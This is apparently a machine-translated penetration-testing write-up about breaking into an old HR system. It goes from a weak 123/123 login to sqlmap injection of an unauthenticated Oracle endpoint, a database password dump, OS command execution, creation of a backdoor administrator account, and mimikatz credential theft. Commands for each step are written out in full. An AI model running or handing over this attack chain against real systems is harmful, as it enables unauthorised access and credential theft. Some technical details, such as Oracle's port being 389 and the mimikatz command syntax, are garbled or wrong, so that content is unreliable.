Title: From weak password to getshell at one time

0x01 Weak password

During the process of collecting information for a certain site, scan the subdomain name to scan to an old system.

When I saw that this was the old station in 2014, there must be something wrong!

Try burp blasting with daily use, but it didn't burst out

But after a quick try, the good guy entered the system on 123/123, and he was full of luck.

(High-intensity coding)

Here we can see that it is the permission of an "editor" personnel, and there are no backend management functions such as uploading. We can only patiently go through various functions of the system.

0x02 SQL injection

Enter the system and flipped, there was no sensitive information leak, but SQL injection was found on an interface where the personnel information was inquired (scanned by xray passive scan)

http://host.com/xxx/control/SearchMenHunInfo?content=123

At this time, if you want to manually verify it, you will find that you can access the interface directly without even needing a background cookie, which is equivalent to an unauthorized access vulnerability.

Then this SQLmap shuttle, the --cookie parameter is not necessary

python sqlmap.py -u 'http://host.com/xxx/control/SearchMenHunInfo?content=123' --current-db

The library name is here, and you can also see that this is an Oracle database. I plan to try it with the shell.

However, in my daily penetration process, Oracle databases are not common. The --os-shell parameter in SQLmap still does not support Oracle databases, so I can only learn and sell them as soon as possible.

0x03 getshell

First refer to this article Oracle Injection - Command Execution Shell Bounce

The following versions of Oracle can be executed after discovering injection.

Then use SQLmap to view the Oracle version

python sqlmap.py -u 'http://host.com/xxx/control/SearchMenHunInfo?content=123' -b

It seems to be in line with the version that can be executed by commands!

After another long wave of learning, I discovered that a tool that a github guy has integrated into oracleShell oracle database command execution

The tool screenshot is as follows

It can be seen that we also need to know the database SID, username, and password to try to execute the command.

Then continue to use sqlmap to expand our known information.

View database permissions --is-dba

View database IP, SID

Here we enter the --sql-shell mode of sqlmap, and use SQL statements to query

Query SID: select instance_name from v$instance

Query the current IP: select sys_context('userenv','ip_address') from dual

Blast all database accounts and passwords

Use the --passwords parameter of sqlmap to run out the username and corresponding password of the database

After a long wait, the result was finally obtained (the fictional data is given here)

database management system users password hashes:

[*] ANONYMOUS [1]:

password hash: anonymous

[*] HR [1]:

password hash: 6399F3B38EDF3288

[*] SYS [1]:

password hash: 4DE42795E66117AE

[*] SYSMAN [1]:

password hash: B607EEBB3A2D36D0

[*] SYSTEM[1]:

password hash: 8877FF8306EF558B

clear-text password: SYS

You can see that some user names only get the corresponding hash, but one of the user names system successfully ran out of the plaintext password!

Query Oracle commonly used ports

Oracle is really not familiar with it, so Baidu checks the ports:

Query found that the default port number of the server is generally 389, and the default port number of the client is generally 1521.

OK! Now you have IP, PORT, SID, username (SYSTEM), and password (SYS), and you can directly connect using the tool.

all the best! Obtained system permissions!

0x04 Further prove the harm

Try creating a user

net user name pwd /add

net localgroup Administrators name /add

Remote desktop RDP connection name/pwd

The connection was successful!

Upload a mimikatz and grab the administrator's plaintext password

privilege:debug

sekurlsa:logonPasswords

Finally logged in to the Administrator account RDP successfully

At this point, the penetration ends.

0x05 Summary

Weak password-sql injection-getshell-get administrator permissions

1. Scan the target domain name through the subdomain name scanning tool and find that there is a human resource management system

2. Enter the system by manually testing the 123/123 weak password

3. There is a SQL injection vulnerability in the background query personnel (scanned by xray passive scan)

4. Run the current database into oracle through sqlmap

python sqlmap.py -u 'http://host.com/xxx/control/SearchMenHunInfo?content=123' --current-db

5. The --os-shell parameter in sqlmap does not support Oracle database, so you can only find sensitive information through --os-sql.

6. Query the oracle version and find that the version is 10.2.1.0 (the versions that can execute commands by oracle are 8.1.7.4, 9.2.01-9.2.0.7, 10.1.0.2-10.1.0.4, 10.2.0.1-10.2.0.2)

python sqlmap.py -u 'http://host.com/xxx/control/SearchMenHunInfo?content=123' -b

7. Query database permissions, which is DBA permissions

python sqlmap.py -u 'http://host.com/xxx/control/SearchMenHunInfo?content=123' --is-dba

8. Use --os-sql to find and view database IP and SID

select instance_name from v$instance //Query SID

select sys_context('userenv','ip_address') from dual //Query the current IP

9. Password dump is performed through SQLmap, and the username system successfully runs out the plaintext password

python sqlmap.py -u 'http://host.com/xxx/control/SearchMenHunInfo?content=123' --passwords

10. At the same time, the database server IP was scanned through nmap and the 1521 port was opened.

11. Remotely connect to the database through the oracleshell tool and execute system commands

12. Add the username and password in the command and add it to the administrator group to enable remote desktop through the registry.

net user name pwd /add

net localgroup Administrators name /add

13. Read the system password through mimikatz

privilege:debug

sekurlsa:logonPasswords

Original link: https://www.freebuf.com/articles/web/284911.html